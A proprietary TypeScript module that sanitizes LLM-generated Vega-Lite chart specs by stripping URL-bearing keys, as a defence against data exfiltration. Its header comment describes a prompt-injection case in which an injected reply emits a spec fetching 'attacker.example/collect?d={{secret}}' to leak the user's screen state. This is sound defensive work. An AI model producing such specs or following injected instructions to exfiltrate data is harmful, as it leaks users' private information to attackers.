// Copyright (c) 2026 Finerty Data Ltd. All rights reserved.
//
// This file is part of proprietary software owned by Finerty Data Ltd.
// It is confidential and may not be copied, distributed, modified, or used,
// in whole or in part, without the prior written consent of Finerty Data Ltd.
//
// Author: Ahmed Hosny

/**
 * Strips fields from a Vega-Lite spec that could be abused for data
 * exfiltration. Vega-Lite specs can carry `data.url`,
 * `transform[].lookup.from.data.url`, and `loader.http` knobs that fetch
 * remote URLs at render time. A prompt-injected reply that emits a spec
 * referencing `attacker.example/collect?d={{secret}}` would happily ship
 * the user's screen state on render.
 *
 * Defence: recursively strip every `url` and `href` key from the spec
 * tree before passing it to vega-embed. The LLM is told (V13 prompt) to
 * inline data only; this is belt-and-braces.
 *
 * Returns a *new* object — never mutates the input.
 */
export function sanitizeVegaSpec(spec: unknown): unknown {
  return walk(spec);
}

/**
 * Field names whose values pull bytes from the network. We don't accept
 * any of them — even if the LLM emits a spec with `data.url: <something
 * benign>`, we'd rather fail loudly than open the channel.
 */
const STRIPPED_KEYS = new Set([
  'url',
  'href',
  // Vega's loader config can also point to remote files.
  'baseURL',
  // CSV/TSV/JSON `url` aliases — be explicit.
]);

function walk(node: unknown): unknown {
  if (Array.isArray(node)) {
    return node.map(walk);
  }
  if (node && typeof node === 'object') {
    const out: Record<string, unknown> = {};
    for (const [key, value] of Object.entries(node as Record<string, unknown>)) {
      if (STRIPPED_KEYS.has(key)) {
        continue;
      }
      out[key] = walk(value);
    }
    return out;
  }
  return node;
}

/**
 * Compact summary of what the LLM emitted, for logging.
 */
export function specSummary(spec: unknown): string {
  if (!spec || typeof spec !== 'object') return 'invalid';
  const obj = spec as Record<string, unknown>;
  const mark = obj.mark;
  const markName = typeof mark === 'string' ? mark : (mark as Record<string, unknown>)?.type;
  return `vega-lite mark=${markName ?? 'unknown'}`;
}
